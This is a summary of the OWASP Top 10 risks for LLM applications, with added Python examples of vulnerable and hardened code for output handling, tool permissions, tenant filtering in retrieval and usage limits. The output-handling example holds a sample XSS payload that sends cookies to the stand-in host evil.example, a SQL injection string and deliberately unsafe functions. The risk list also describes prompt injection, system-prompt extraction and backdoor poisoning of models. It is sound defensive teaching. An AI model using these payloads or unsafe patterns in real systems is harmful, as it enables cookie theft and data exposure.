
OWASP Top 10 LLM Risks


A summary of the ten risk categories in the OWASP Top 10 for LLM Applications (2025 list), with the security-relevant point of each.

#1

Prompt Injection

Crafted input that causes the LLM to ignore its instructions or take unauthorized actions. Injection can be direct (the attacker types the prompt) or indirect (the payload arrives in content the model processes, such as a web page, an email, or a retrieved document), and its impact scales with whatever data and tools the model can reach.

#2

Sensitive Information Disclosure

The LLM reveals confidential data (PII, credentials, internal business context) drawn from its training data, the current context window, or connected retrieval systems. Anything placed in the context can end up in an answer, so data minimization and output filtering matter more than instructions telling the model to keep secrets.

#3

Supply Chain Risks

Compromise through vulnerable or tampered pre-trained models (including weights pulled from public model hubs), third-party plugins or tool integrations, and datasets used to build, train, or integrate the LLM application.

#4

Data and Model Poisoning

Malicious actors inject corrupted, biased, or backdoored data during pre-training, fine-tuning, or embedding, leading the model to learn harmful, incorrect, or prejudiced behaviour, or to respond to a hidden trigger input.

#5

Improper Output Handling

The LLM's output (HTML, SQL, shell commands, code) is passed to downstream components such as a browser, a database, or an interpreter without validation or encoding. Because that output can be attacker-influenced through prompt injection, the result is classic XSS, SQL injection, or remote code execution with the model as the conduit.
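An added example (not code from the page or from OWASP) of the two most common sinks for this risk, a browser and a database, each shown in its vulnerable and hardened form. The model outputs, the table, and the `evil.example` host are constructed for the demonstration; the fix is the same as for any untrusted input: encode on the way into HTML, validate the shape and bind as a parameter on the way into SQL.

```python
import html
import sqlite3

# Constructed samples of model output an attacker could steer via prompt
# injection (assumption: the app asks the model for a note and an order id).
MODEL_OUTPUT_NOTE = 'Thanks! <img src=x onerror="fetch(\'https://evil.example/?c=\'+document.cookie)">'
MODEL_OUTPUT_ID = "42 OR 1=1"


def render_unsafe(model_text: str) -> str:
    """Vulnerable: model output is concatenated into the page as raw HTML."""
    return f"<div class='note'>{model_text}</div>"


def render_safe(model_text: str) -> str:
    """Hardened: the model is untrusted input; encode it before it reaches the DOM."""
    return f"<div class='note'>{html.escape(model_text, quote=True)}</div>"


def setup_db() -> sqlite3.Connection:
    """In-memory table with three orders owned by different users (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE orders (id INTEGER PRIMARY KEY, owner TEXT)")
    conn.executemany(
        "INSERT INTO orders VALUES (?, ?)",
        [(42, "alice"), (43, "bob"), (44, "carol")],
    )
    return conn


def lookup_unsafe(conn: sqlite3.Connection, model_id: str) -> list:
    """Vulnerable: model text is interpolated straight into the SQL string."""
    return conn.execute(f"SELECT owner FROM orders WHERE id = {model_id}").fetchall()


def lookup_safe(conn: sqlite3.Connection, model_id: str) -> list:
    """Hardened: validate the shape of the value, then bind it as a parameter."""
    candidate = model_id.strip()
    if not candidate.isdigit():
        raise ValueError(f"model did not return a numeric id: {model_id!r}")
    return conn.execute(
        "SELECT owner FROM orders WHERE id = ?", (int(candidate),)
    ).fetchall()


if __name__ == "__main__":
    print(render_unsafe(MODEL_OUTPUT_NOTE))
    print(render_safe(MODEL_OUTPUT_NOTE))
    conn = setup_db()
    print(lookup_unsafe(conn, MODEL_OUTPUT_ID))   # every row leaks
    try:
        lookup_safe(conn, MODEL_OUTPUT_ID)
    except ValueError as exc:
        print("rejected:", exc)
```

Note that `lookup_safe` rejects the injected id rather than trying to clean it: when the model returns something that is not the type the application asked for, the right move is to fail closed and log it, not to guess.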

#6

Excessive Agency

The LLM, or an agent built on it, is granted more functionality, permissions, or autonomy than the task requires, so a manipulated or hallucinating model can take damaging actions such as deleting data or transferring funds. The mitigations are least privilege per tool, scoped credentials held by the application rather than the model, and human approval for high-impact actions.
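An added example (not from the page or from OWASP) of a tool gateway that enforces those three controls: an allowlist of tools, a per-tool argument policy, and a confirmation hook for destructive actions. The account data, the `get_balance`/`transfer` tools, the 200-unit per-call limit, and the JSON request shape are all assumptions made for the demonstration.

```python
import json
from dataclasses import dataclass
from typing import Any, Callable, Optional

# Constructed backing state; stands in for a real banking API (assumption).
ACCOUNTS = {"A-1": 500, "A-2": 100}


def get_balance(account: str) -> int:
    return ACCOUNTS[account]


def transfer(src: str, dst: str, amount: int) -> int:
    ACCOUNTS[src] -= amount
    ACCOUNTS[dst] += amount
    return ACCOUNTS[src]


def check_transfer(args: dict) -> None:
    """Per-tool argument policy: known accounts only, bounded amounts."""
    if args.get("src") not in ACCOUNTS or args.get("dst") not in ACCOUNTS:
        raise ValueError("unknown account")
    amount = args.get("amount")
    if not isinstance(amount, int) or not 0 < amount <= 200:
        raise ValueError("amount outside the per-call limit")


@dataclass(frozen=True)
class Tool:
    fn: Callable[..., Any]
    allowed_args: frozenset
    destructive: bool = False
    validate: Optional[Callable[[dict], None]] = None


# The allowlist: only these tools exist from the model's point of view.
# Anything else it asks for (e.g. "drop_accounts") simply does not resolve.
TOOLS = {
    "get_balance": Tool(get_balance, frozenset({"account"})),
    "transfer": Tool(transfer, frozenset({"src", "dst", "amount"}),
                     destructive=True, validate=check_transfer),
}


class ToolGateway:
    """Mediates every action the model requests. The model emits JSON such as
    {"tool": "transfer", "args": {...}}; it never holds credentials or calls
    functions directly, so its agency is bounded by this table."""

    def __init__(self, tools: dict, confirm: Callable[[str, dict], bool]):
        self.tools = tools
        self.confirm = confirm      # human-in-the-loop hook for destructive tools
        self.audit: list = []       # every executed action, for forensics

    def dispatch(self, model_request: str) -> Any:
        req = json.loads(model_request)
        name, args = req.get("tool"), req.get("args", {})
        tool = self.tools.get(name)
        if tool is None:
            raise PermissionError(f"tool {name!r} is not allowlisted")
        extra = set(args) - tool.allowed_args
        if extra:
            raise ValueError(f"unexpected arguments for {name}: {sorted(extra)}")
        if tool.validate:
            tool.validate(args)
        if tool.destructive and not self.confirm(name, args):
            raise PermissionError(f"{name} requires approval and was denied")
        self.audit.append((name, dict(args)))
        return tool.fn(**args)


def build_gateway(confirm: Callable[[str, dict], bool]) -> ToolGateway:
    return ToolGateway(TOOLS, confirm)


if __name__ == "__main__":
    gw = build_gateway(lambda name, args: False)   # nobody approves anything
    print(gw.dispatch('{"tool": "get_balance", "args": {"account": "A-1"}}'))
    for bad in ('{"tool": "drop_accounts", "args": {}}',
                '{"tool": "transfer", "args": {"src": "A-1", "dst": "A-2", "amount": 50}}'):
        try:
            gw.dispatch(bad)
        except (PermissionError, ValueError) as exc:
            print("blocked:", exc)
```

The ordering inside `dispatch` is deliberate: allowlist, then argument schema, then argument policy, then approval. A request for an unknown tool or an out-of-policy amount never reaches the human approver, which keeps approval fatigue down and makes the audit trail reflect only actions that were actually executed.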

#7

System Prompt Leakage

An attacker extracts the system prompt, exposing the application's operating logic and any sensitive data placed in it. The prompt should not be treated as a secret or as a security control: credentials, connection strings, and authorization rules belong outside it, enforced by the application, so that disclosure of the prompt alone causes no harm.

#8

Vector and Embedding Weaknesses

Weaknesses in vector databases and Retrieval-Augmented Generation (RAG) pipelines, such as missing access control in shared indexes (one tenant's documents retrieved for another), poisoned or injected documents that steer retrieval and carry indirect prompt injection, and embedding inversion that recovers source text from stored vectors.
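An added example (not from the page or from OWASP) of the access-control failure in a shared index: a similarity-only search returns whichever chunks score highest, regardless of who owns them, while a hardened search filters by the caller's tenant before ranking. The bag-of-words "embedding", the three documents, and the tenant names are constructed stand-ins; a real deployment would use a proper embedding model and the vector store's metadata filters, but the control lives in the same place, the retrieval layer, not in the prompt.

```python
import math
from collections import Counter

# Toy embedding: bag-of-words counts. A stand-in for a real embedding model
# (assumption) so the example runs offline; the ACL logic does not depend on it.
def embed(text: str) -> Counter:
    return Counter(text.lower().split())


def cosine(a: Counter, b: Counter) -> float:
    dot = sum(a[k] * b[k] for k in a)
    norm_a = math.sqrt(sum(v * v for v in a.values()))
    norm_b = math.sqrt(sum(v * v for v in b.values()))
    return dot / (norm_a * norm_b) if norm_a and norm_b else 0.0


# Constructed corpus: two tenants sharing one index, as in a multi-tenant SaaS.
DOCS = [
    {"id": 1, "tenant": "acme",   "text": "acme payroll export salary data for march"},
    {"id": 2, "tenant": "globex", "text": "globex payroll export salary data for march"},
    {"id": 3, "tenant": "acme",   "text": "acme office wifi password rotation policy"},
]
INDEX = [(doc, embed(doc["text"])) for doc in DOCS]


def search_unfiltered(query: str, k: int = 2) -> list:
    """Vulnerable: ranks every chunk in the index by similarity only."""
    q = embed(query)
    ranked = sorted(INDEX, key=lambda item: cosine(q, item[1]), reverse=True)
    return [doc["id"] for doc, _ in ranked[:k]]


def search_with_acl(query: str, tenant: str, k: int = 2) -> list:
    """Hardened: restrict candidates to the caller's tenant before ranking."""
    q = embed(query)
    candidates = [(doc, vec) for doc, vec in INDEX if doc["tenant"] == tenant]
    ranked = sorted(candidates, key=lambda item: cosine(q, item[1]), reverse=True)
    return [doc["id"] for doc, _ in ranked[:k]]


if __name__ == "__main__":
    query = "payroll salary march"
    print("no ACL, globex user sees:", search_unfiltered(query))        # acme's doc too
    print("ACL,    globex user sees:", search_with_acl(query, "globex"))
```

Filtering after ranking is not equivalent: a post-filter still lets the other tenant's chunk occupy a top-k slot (and, in some stores, still leaks its score), and an attacker who can poison the index can push their chunk into that slot deliberately.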

#9

Misinformation

The LLM produces false, inaccurate, or misleading content (hallucinations) that users or downstream systems accept as fact. Overreliance compounds the risk: acting on fabricated citations, non-existent API calls, or hallucinated package names without verification turns a wrong answer into a security incident.

#10

Unbounded Consumption

Missing or ineffective limits on request rate, input size, output length, and spend let attackers cause denial of service, run up the bill (sometimes called denial of wallet), or extract the model's behaviour through large volumes of queries.
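An added example (not from the page or from OWASP) of the limits a practitioner would put in front of the model call: a per-user request rate, a prompt size cap, an output cap, and a running token budget, all checked before the expensive call is made and charged after it. The 4-characters-per-token estimate, the 60-second window, and the budget numbers are assumptions for the demonstration; a real service would use the model's tokenizer and persist the counters outside the process.

```python
import time
from collections import defaultdict, deque
from typing import Callable


class RateLimited(Exception):
    pass


class BudgetExceeded(Exception):
    pass


def estimate_tokens(text: str) -> int:
    """Cheap pre-call estimate (assumption: roughly 4 characters per token).
    A production service would use the model's own tokenizer instead."""
    return max(1, len(text) // 4)


class ManualClock:
    """Deterministic clock so the limiter can be exercised without sleeping."""
    def __init__(self) -> None:
        self.now = 0.0

    def __call__(self) -> float:
        return self.now


class UsageGuard:
    """Per-user request rate limit, prompt size cap, output cap and token budget,
    all enforced before the (expensive) model call is made."""

    def __init__(self, rpm: int, token_budget: int, max_input_tokens: int,
                 max_output_tokens: int, clock: Callable[[], float] = time.monotonic):
        self.rpm = rpm
        self.token_budget = token_budget
        self.max_input_tokens = max_input_tokens
        self.max_output_tokens = max_output_tokens
        self.clock = clock
        self.recent = defaultdict(deque)   # user -> request timestamps in the last 60 s
        self.spent = defaultdict(int)      # user -> tokens consumed so far

    def admit(self, user: str, prompt: str) -> int:
        """Return the max_tokens value to pass to the model, or raise."""
        now = self.clock()
        window = self.recent[user]
        while window and now - window[0] >= 60:
            window.popleft()
        if len(window) >= self.rpm:
            raise RateLimited(f"{user}: more than {self.rpm} requests per minute")
        prompt_tokens = estimate_tokens(prompt)
        if prompt_tokens > self.max_input_tokens:
            raise ValueError(f"prompt of ~{prompt_tokens} tokens exceeds the cap")
        remaining = self.token_budget - self.spent[user]
        if remaining <= prompt_tokens:
            raise BudgetExceeded(f"{user}: token budget exhausted")
        window.append(now)
        # One response may never exceed the output cap or the leftover budget.
        return min(self.max_output_tokens, remaining - prompt_tokens)

    def record(self, user: str, prompt: str, completion: str) -> int:
        """Charge actual usage after the call; returns the user's total so far."""
        self.spent[user] += estimate_tokens(prompt) + estimate_tokens(completion)
        return self.spent[user]


if __name__ == "__main__":
    clock = ManualClock()
    guard = UsageGuard(rpm=3, token_budget=100, max_input_tokens=50,
                       max_output_tokens=40, clock=clock)
    for i in range(4):
        try:
            print("request", i, "admitted, max_tokens =", guard.admit("alice", "hello world"))
        except RateLimited as exc:
            print("request", i, "blocked:", exc)
    clock.now = 61.0
    print("after the window:", guard.admit("alice", "hello world"))
```

The value returned by `admit` is meant to be passed as the model's `max_tokens` (or equivalent) parameter, so a single request cannot be turned into an arbitrarily long, arbitrarily expensive generation even if the prompt asks for one.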

Source: OWASP Foundation – Top 10 for Large Language Model Applications